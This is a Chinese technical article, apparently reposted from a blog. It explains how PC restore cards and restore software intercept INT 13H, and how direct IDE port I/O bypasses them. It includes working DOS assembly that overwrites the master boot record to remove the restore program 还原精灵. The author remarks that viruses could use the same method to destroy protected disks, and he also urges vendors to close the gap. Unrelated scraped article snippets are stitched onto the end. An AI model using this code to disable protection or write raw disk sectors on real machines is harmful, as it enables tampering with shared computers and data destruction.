CVC/GB  风般的男人
还原卡和还原软件被广泛运用于各种公共场合的电脑上,比如学校机房和网吧。这些还原卡和还原软件(以下我简称为虚拟还原技术)能够记录下一切对 硬盘 的写操作,不论您对 硬盘 进行拷贝还是移动删除甚至是格式化分区等操作,只要一重新启动,一切都会恢复到这个操作之前的情况,因此有些虚拟还原厂商还会在广告词中加上一句“可以防范一切电脑病毒”。这种虚拟还原的方法在大部分时候的确可以对公共机房的电脑起到很好的保护作用,难道真的没有一种方法能够穿透这种保护机制么?答案是否定的,下面请听我一一道来。
一、虚拟还原技术的原理
本文所说的是一种普遍运用于还原卡或还原软件上的技术,当然,不同品牌不同厂商生产的可能不尽相同,但原理却是相通的。
首先,还原卡和还原软件会抢先夺取引导权,将原来的0头0道1扇保存在一个其他的扇区,(具体备份到那个扇区是不一定的),将自己的代码写入0头0道1扇,从而能在操作系统之前得到执行权,这一点类似于一个引导型病毒;然后,我们来看看虚拟还原技术在操作系统之前都做了些什么:
1.将中断向量表中的INT13H的入口地址保存;
2.把自己用于代替INT13H的代码写入内存,并记住入口地址,当然这种“写入内存”并不是普通的“写”,而是一种我们称为“常驻”的方法,有关“常驻程序”的实现方法我们不另外花篇幅来描述了,如果你还不了解的话请自己找有关资料,也可以 www.hackart.org www.lsky.net找风般的男人交流;
3.将中断向量表中INT13H的入口地址改为这段常驻程序的入口地址。补充一点,虚拟还原程序在修改INT13H的入口后往往都会修改一些其他中断入口,当然也是通过常驻程序来实现的,这些中断用来实现对中断向量表中INT13H入口地址监控,一旦发现被修改,就马上把它改回,这样做同样是用来防止被有心人破解。
好了,你已经看出来了,这段用来替代BIOS提供的INT13H的代码才是虚拟还原技术的关键,那么这段代码到底实现了些什么了,以下是本人对此拙浅的理解:
1.拦截所有INT13H中对 硬盘0头0道1扇的操作
这些包括读写操作,把所有的对0头0道1扇的操作改为对虚拟还原程序备份的那个扇区的操作,这样做的目的是保护虚拟还原代码不被破坏,并且不能被有心人读出进行破解,即使你用扇区编辑工具查看主引导区,实际上你看到的是这个备份的主引导区。
2.拦截所有INT13H中的写 硬盘操作
这里包括对8G以下的 硬盘的普通通过 磁头、磁道、扇区定位的INT13H中的写操作,和扩展INT13H中基于扇区地址方式的对大 硬盘的写操作,甚至包括扩展INT13H中对一些非 IDE 接口的 硬盘的写操作。
至于拦截后做什么是虚拟还原技术实现的关键,在早期的DOS系统当中完全可以“什么都不做”,也就是说当用户写 硬盘时实际上是什么都没做,但现在的操作系统都要对 硬盘进行一些必要的写操作,比如对虚拟内存的写操作。众所周知,虚拟内存实际上就是 硬盘,而如果禁止操作系统写 硬盘的话显然后果是不堪设想的。所以,大多数虚拟还原厂商用的方法是占用一些 硬盘空间,把 硬盘所进行的写操作做一个记录,等系统重新启动后还原这一记录,但是怎样科学记录 硬盘的写操作,是我一直没想通的问题,这种“科学”应该体现在时间上和 硬盘空间的占用量上的,也就是说怎么样用最少的时间和最少的 硬盘空间来记录 硬盘的写操作是实现关键,如果有这方面想法的朋友欢迎和我交流;
3.备份端口70H,71H中的内容,并把最后一次执行时端口70H,71H的内容和备份的内容做比较,不一样就提示BIOS被修改,是否还原,并通过密码验证修改BIOS是否合法。 二、PC机的中断机制
中断提供了最基本的硬件和软件的 接口,它使得程序员不必了解硬件系统的细节,只要直接调用系统提供的中断服务子程序,就可以完成相应功能,这样能使得程序设计更为方便。其实现机制如下:当某一中断源发出中断请求时,CPU能够决定是否响应这一中断请求(当CPU在执行更为重要的工作时,可以暂不响应),如果允许响应该中断,CPU会在现行的指令执行完后,把断点处的下一条指令地址和各寄存器的内容和标志位的状态,推入堆栈进行保护,然后转到中断源服务程序的入口,进行中断处理,当中断处理完成后,再恢复被保留的各寄存器、标志位状态和指令指针,使CPU返回断点,继续执行下一条指令。
为了区别各个中断,CPC系统给每个中断都分配了一个中断号N,比如INT 3H是断点中断,INT 10H是显示中断,我们今天要讨论的主要是INT 13H磁盘读写中断。
要说清楚PC机上的中断机制,用这一点篇幅是完全不够的,这里我所说的只是一个大概,如果你不清楚的话,请查阅一些资料或和我交流,我们今天重要要说的就是以INT13H为例看看BIOS提供给我们的中断到底都是在做什么?所谓BIOS中断简单说就是你机器上的BIOS提供的中断,那么在BIOS中断的后面,到底是些什么呢?实际上是一些对端口的输入输出操作,PC的每个端口都实现特定的功能,我们完全可以不调用BIOS提供的中断而直接用输入输出指令对这些端口进行操作,从而可以实现象调用BIOS中断一样的功能,但是一个前提是你必须对这些端口有详细的了解。反过来说,PC的中断系统的一大好处就是能够让程序员无须了解系统底层的硬件知识的而能够编程,从这点看,中断有点象我们平时所说的“封装”,我不知道这样说对不对,但的确中断为我们“封装”了许多系统底层的细节。 三、 硬盘读写端口的具体含义
   对 硬盘进行操作的常用端口是1f0h~1f7h号端口,各端口含义如下:
端口号     读还是写   具体含义
1F0H       读/写      用来传送读/写的数据(其内容是正在传输的一个字节的数据)
1F1H       读         用来读取错误码
1F2H       读/写      用来放入要读写的扇区数量
1F3H       读/写      用来放入要读写的扇区号码
1F4H       读/写      用来存放读写柱面的低8位字节
1F5H       读/写      用来存放读写柱面的高2位字节(其高6位恒为0)
1F6H       读/写      用来存放要读/写的磁盘号及 磁头号
                     第7位     恒为1
                     第6位     恒为0
                     第5位     恒为1
                     第4位     为0代表第一块 硬盘、为1代表第二块 硬盘
                     第3~0位    用来存放要读/写的 磁头号
1f7H       读         用来存放读操作后的状态
                     第7位     控制器忙碌
                     第6位     磁盘驱动器准备好了
                     第5位     写入错误
                     第4位     搜索完成
                     第3位     为1时扇区缓冲区没有准备好
                     第2位     是否正确读取磁盘数据
                     第1位     磁盘每转一周将此位设为1,
                     第0位     之前的命令因发生错误而结束
          写         该位端口为命令端口,用来发出指定命令
                     为50h     格式化磁道
                     为20h     尝试读取扇区
                     为21h     无须验证扇区是否准备好而直接读扇区
                     为22h     尝试读取长扇区(用于早期的 硬盘,每扇可能不是512字节,而是128字节到1024之间的值)
                     为23h     无须验证扇区是否准备好而直接读长扇区
                     为30h     尝试写扇区
                     为31h     无须验证扇区是否准备好而直接写扇区
                     为32h     尝试写长扇区
                     为33h     无须验证扇区是否准备好而直接写长扇区
注:当然看完这个表你会发现,这种读写端口的方法其实是基于 磁头、柱面、扇区的 硬盘读写方法,不过大于8G的 硬盘的读写方法也是通过端口1F0H~1F7H来实现的^_^
四、一个通过对 硬盘输入输出端口操作来读写 硬盘的实例
让我们来看一个关于INT13H读写 硬盘程序实例。在例子中详细说明了 硬盘的读写操作所用到的端口,并且把通过INT13H读出的主引导区得到的数据和通过输入输出读主引导区得到的数据进行比较,从而证实这两种操作功能相同,程序片段如下: mov     dx,1f6h         ; 要读入的磁盘号及 磁头号
mov     al,0a0h         ;磁盘0, 磁头0  
out      dx,al

mov     dx,1f2h         ;要读入的扇区数量
mov     al,1            ;读一个扇区    
out      dx,al

mov     dx,1f3h         ;要读的扇区号
mov     al,1            ;扇区号为1
out      dx,al

mov     dx,1f4h         ;要读的柱面的低8位
mov     al,0            ; 柱面低8位为0
out     dx,al

mov     dx,1f5h         ; 柱面高2位  
mov     al,0            ; 柱面高2位为0(通过1F4H和1F5H端口我们可以确定
; 用来读的柱面号是0)
out      dx,al

mov     dx,1f7h         ;命令端口
mov     al,20h          ; 尝试读取扇区
out      dx,al
still_going:
in      al,dx
test     al,8            ;扇区缓冲是否准备好
jz     still_going     ;如果扇区缓冲没有准备好的话则跳转,直到准备好才向下执行。

mov     cx,512/2        ;设置循环次数(512/2次)
mov     di,offset buffer
mov     dx,1f0h         ;将要传输的一个字节的数据
rep      insw            ;传输数据

;   ------

mov     ax,201h         ;以下是用INT13H读 硬盘的0 磁头、0柱面、1扇区
mov     dx,80h
mov     cx,1
mov     bx,offset buffer2
int       13h

mov     cx,512         ;以下部分用来比较2种方法读出的 硬盘数据
mov     si,offset buffer
mov     di,offset buffer2
repe     cmpsb
jne      failure
mov     ah,9
mov     dx,offset readmsg
int      21h
jmp     good_exit
failure:
mov     ah,9
mov     dx,offset failmsg
int       21h
good_exit:              ;以下部分用来结束程序
mov      ax,4c00h        ;退出程序
int      21h

readmsg db      'The buffers match.  Hard disk read using ports.$'
 failmsg db      'The buffers do not match.$'
buffer  db      512 dup ('V')
buffer2 db      512 dup ('L') 五、可以穿透还原卡或是还原软件保护的代码
你可以对照 硬盘读写端口含义表,再好好看看上面的例子,你将会对 硬盘读写端口有一个比较深的理解。好了,到了该把谜底揭晓的时候了,重新回到我们的主题。正如你现在想象的,这种可以穿透还原卡或是还原软件保护的代码的确是对 硬盘读写端口的输入输出操作。现在,我们已经可以从原理上理解了,还原卡拦截的是中断操作,但却拦截不了输入输出操作,而用输入输出操作足够可以对 硬盘进行写操作了,当然用输入输出操作也完全可以读到被虚拟还原程序屏蔽的关键部分,被还原卡或是还原软件屏蔽的0头0道1扇。知道了这一原理以后,可能是仁者见仁智者见智的,如果你是一个虚拟还原技术的破解者、一个病毒制造者,或是虚拟还原技术的设计者,往往对此的理解都是不尽相同的。
在此强调我不赞成制造病毒,但一个病毒制造者完全可以用此原理写出一个可以实现破坏装有还原卡或还原软件的机器了,所以我要提醒虚拟还原用户的是,不要以为装有还原卡或是还原软件就掉以轻心,要知道世界上还是有病毒能够穿透虚拟还原技术的保护,达到破坏 硬盘的目的的,想象一下如果把这一原理运用到CIH病毒中,或者运用到 硬盘杀手病毒中,其后果是不堪设想的。
谈谈如何用这种可以穿透虚拟还原技术的代码来破解还原软件(如还原精灵)吧。以下是我写的用来测试破解还原精灵的代码,本代码编译后的程序需要在纯DOS环境执行,在DOS下我用这段代码成功的把还原精灵给卸载了。
.286
CODE SEGMENT
    ASSUME CS:CODE,DS:code,ES:code
START:
;----------------------------------------------------------
;以下代码用INT13H读主引导区
mov     ax,0201h
mov     dx,0080h
mov     cx,0001h
mov     bx,7c00h
int      13h
;---------------------------------------------------------
;以下代码用I/O端口来写主引导区
mov     dx,1f6h         ; 要读入的磁盘号及 磁头号
mov     al,0a0h         ; 磁盘0, 磁头0
out      dx,al

mov     dx,1f2h         ; 要写的扇区数量
mov     al,1            ; 写一个扇区
out      dx,al

mov     dx,1f3h         ;要写的扇区号
mov     al,1            ;写到1扇区
out      dx,al

mov     dx,1f4h         ; 要写的柱面的低8位
mov     al,0            ; 低8位为0
out      dx,al

mov     dx,1f5h         ; 要写的柱面的高2位
mov     al,0            ; 高2位为0
out      dx,al

mov     dx,1f7h         ;命令端口
mov     al,30h          ;尝试着写扇区.
out      dx,al
oogle:
in       al,dx
test      al,8            ;磁盘扇区缓冲是否准备好
jz       oogle

mov     cx,512/2        ;设置循环次数(512/2)
mov     si,7c00h
mov     dx,1f0h         ;数据端口,用来存放要发送的数据.
rep      outsw           ;发送数据.
; ------------------------------------------------------------------------------
;退出程序
mov     ah,4ch
int       21
CODE ENDS
    END START
上面的程序非常简单,说明如下:
1、先把被还原精灵备份的原来的主引导区用INT13H读出来,这里虽然是对0头0道1扇进行读操作,但实际上是在读被还原精灵把原来的主引导区备份进去的那个扇区;
2、把读出的原来的主引导区通过输入输出操作写进真正的主引导区,换句话说就是把还原精灵给彻底删除了,此时重新启动你将发现还原精灵已经没有了。
我写了个FORWIN98/NT/XP的卸载还原精灵等软件的程序,大家可到 www.lsky.net下载。
用以上的方法要实现还原卡的破解可能是不行的,因为还原卡毕竟是硬件,它可以先于 硬盘引导前执行,这样即使你写回了 硬盘的主引导区,还原卡还是可以把它写回的,但是,在破解还原卡的时候,完全可以利用文章中的原理,把还原卡写入 硬盘主引导区的真正代码读出进行分析,甚至有些还原卡的密码就在这个扇区中。
   对于还原卡和还原软件的制造者来说,如何让您制造的还原卡或还原软件更安全,可能是一个需要思考的问题。真心希望以后的还原卡或是还原软件在拦截INT13H的同时也能拦截 硬盘I/O操作。
在我安装还原精灵的时候看到一个选项是“防止 硬盘I/O破坏”,开始还以为还原精灵在这方面做的不错,想到了从拦截I/O操作来保护 硬盘。可惜我错了,即使选择这一个选项,也同样可以通过输入输出端口操作来写 硬盘。对于掌握了这种技术的人来说,这种还原卡或是还原软件可以说是形同虚设。因此我认为,还原卡和还原软件不但要实现拦截所有 硬盘写操作、拦截对主引导区的读写操作,更应该拦截对 硬盘的读写端口的操作,只有这样的虚拟还原技术才可能使基于 硬盘的读写端口操作所对 硬盘的破坏或是对虚拟还原技术的破解变成不可能。

一种可以穿透还原卡和还原软件的代码一种可以穿透还原卡和还原软件的代码相关推荐

  1. 电脑计算机无法启动有还原和取消,win7系统提示配置windwos update失败还原更改导致电脑无法开机的三种解决方法...

    win7系统每个一段时间都需要更新,有时候win7旗舰版系统遇到更新失败无法开机进入系统,怎么办呢?而且弹出提示"配置windwos update 失败还原更改,请勿关闭计算机", ...

  2. cad2014卡顿的解决方法_升级iOS14.1后出现卡顿、闪退?这3种方法可以解决

    随着iOS14.1正式版的推出,大家对于该版本有着很高的关注度,毕竟这是iOS14版本第一次正式的小版本更新,同时也将是新机iPhone12系列的预搭载版本. 但是,随着体验了几天的iOS14.1之后 ...

  3. raid卡组不同raid_RAID有哪几种?有什么区别?

    RAID详解 RAID的几种工作模式(仅讨论 RAID0,RAID1,RAID5,RAID10这四种,这四种比较典型) 1.RAID0 (又称为Stripe或Striping--分条) 即Data S ...

  4. git stash后怎么恢复_苹果换卡后怎么恢复通讯录?两种方法帮你解决

    苹果换卡后怎么恢复通讯录?今天小编分两种情况给大家介绍恢复苹果手机通讯录的两种方法,根据自己的情况选择适合自己的操作步骤来找回手机里的通讯录即可. 情景一:使用iCloud同步了通讯录 iCloud是 ...

  5. 用计算机获取机读卡是通过什么实现的,一种基于图像识别技术的答题卡及考试系统的制作方法...

    本发明涉及智能考试系统. 背景技术: 传统答题卡具有如下缺陷: 1.答题卡定位需要右侧和底端的黑点来实现定位整张答题卡的行和列: 2.需要专用答题卡识别机(专有硬件)来识别答案: 3.需要用特种铅笔( ...

  6. sxs卡数据怎么恢复?分享三种恢复方案

    说起sxs卡,你们是否有所了解呢?sxs卡具有很好的传输性能,能够存储照片和视频数据,主要被放置在索尼XDCAM EX型摄像机上.而在使用sxs卡设备过程中,难免和其他设备一样,容易出现数据丢失情况. ...

  7. Linux格式化sd卡博客,linux设备驱动那点事儿之SD卡驱动理论篇

    一.SD/MMC卡介绍 1.1.什么是MMC卡 MMC:MMC就是MultiMediaCard的缩写,即多媒体卡.它是一种非易失性存储器件,体积小巧(24mm*32mm*1.4mm),容量大,耗电量低 ...

  8. android+sim卡短信,android 信息(mms)开发(七)-- sim卡短信

    这篇关于android源码是如何操作sim卡上的信息说明,sim\usim卡的信息说起来这算是比较特别的一部分,由于android源码的信息是没有开机自动导卡信息和联系人的,所以有时会忘掉它的存在应该 ...

  9. Android - xml动画,识别手势动作,代码抽取,获取手机SIM卡串号,获取联系人数据,开机广播,发送/解析短信,报警音乐

    转载请注明出处:https://blog.csdn.net/mythmayor/article/details/72878059 1.Activity的任务栈 1.类似一个木桶,每层只能放一个木块,我 ...

最新文章

  1. 自动驾驶开发云平台业务分析
  2. 计算概论c和文科计算机,计算概论与计算机程序设计基础/C语言【理工学社】
  3. Thinkphp中import的几个用法详细介绍
  4. MYSQL数据库性能调优之六:备份
  5. MCMC笔记:齐次马尔可夫链
  6. asp.net C# 实现上传Excel文件导入数据到SQL Server 数据库
  7. 计算机网络发展第二阶段 兴起于,计算机辅助开始于计算机发展第几阶段
  8. new Class() 与 Class.newInstance()
  9. NoSQL解决方案比较
  10. 苹果或已放弃3月发布廉价新iPhone;贾跃亭回应家人巨额索赔;微软不再继续开发 Visual Basic | 极客头条...
  11. Oracle EBS:打开工作日历查看
  12. shell 监控判断进程是否存在,如果不存在就重新启动脚本。
  13. infopath2007_好吧,很好,所以我服用了该死的红色药丸……行动中的InfoPath(以及小号WinSock的反省)...
  14. Android攻城狮 Handler与子线程
  15. 数据基础---《利用Python进行数据分析·第2版》第12章 pandas高级应用
  16. html密码框ml表单文本框,表单组件 PasswordInput 密码输入框 - 闪电教程JSRUN
  17. CryENGINE3系列总结教程之UI/HUD(二)Flash资源导入CE3
  18. 屡胜姜子牙的二位妖将,竟是5G应用的先驱?
  19. 没有办学资质的机构该如何投诉?中创教育为你解答
  20. python 谷歌小恐龙自动跳跃

热门文章

  1. 3D视觉学习计划之PCL库的基础知识
  2. es拼音分词 大帅哥_SpringBoot集成Elasticsearch 进阶,实现中文、拼音分词,繁简体转换...
  3. windows系统锁定计算机组合键,WIN键间断性触发在锁定状态!!
  4. 什么值传递和引用传递
  5. 编程规则 - 2 命名规则
  6. 图像处理之预处理方法
  7. 架构成长之路 | 图解分布式共识算法Paxos议会协议
  8. 【读书笔记】代码思考
  9. java基础--面向对象三大特性(二)
  10. 详解eclipse如何配置tomcat